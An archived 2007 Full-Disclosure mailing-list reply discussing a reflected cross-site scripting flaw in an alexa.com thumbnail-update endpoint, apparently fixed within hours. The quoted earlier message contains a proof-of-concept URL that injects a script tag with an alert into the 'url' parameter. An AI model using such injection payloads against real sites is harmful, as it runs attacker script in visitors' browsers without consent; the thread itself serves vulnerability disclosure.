[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] alexa.com XSS

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: Re: [Full-disclosure] alexa.com XSS
From: "michele.sandrelli@xxxxxxxxxxxx" <michele.sandrelli@xxxxxxxxxxxx>
Date: Wed, 30 May 2007 01:28:44 +0200

kefka wrote:
> Seems fixed or doesn't work in FireFox 1.5.0.11
> -----------------------
> MC Iglo wrote:
>>
http://thumbnails.alexa.com/update_thumbnail?url=%3Cscript%3Ealert(%22alexa%20sucks%22)%3C/script%3E

It worked perfectly until.. they fixed it : )

Note: It seems that alexa people grep logs or is subscribed to fd since
it worked only for 1-2 hours.

Bye,
Michele Sandrelli

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

References:
- [Full-disclosure] alexa.com XSS
  - From: MC Iglo
- Re: [Full-disclosure] alexa.com XSS
  - From: kefka

Prev by Date: [Full-disclosure] The Next Super JavaScript Malware - the web has crashed
Next by Date: Re: [Full-disclosure] alexa.com XSS
Previous by thread: Re: [Full-disclosure] alexa.com XSS
Next by thread: Re: [Full-disclosure] alexa.com XSS
Index(es):
- Date
- Thread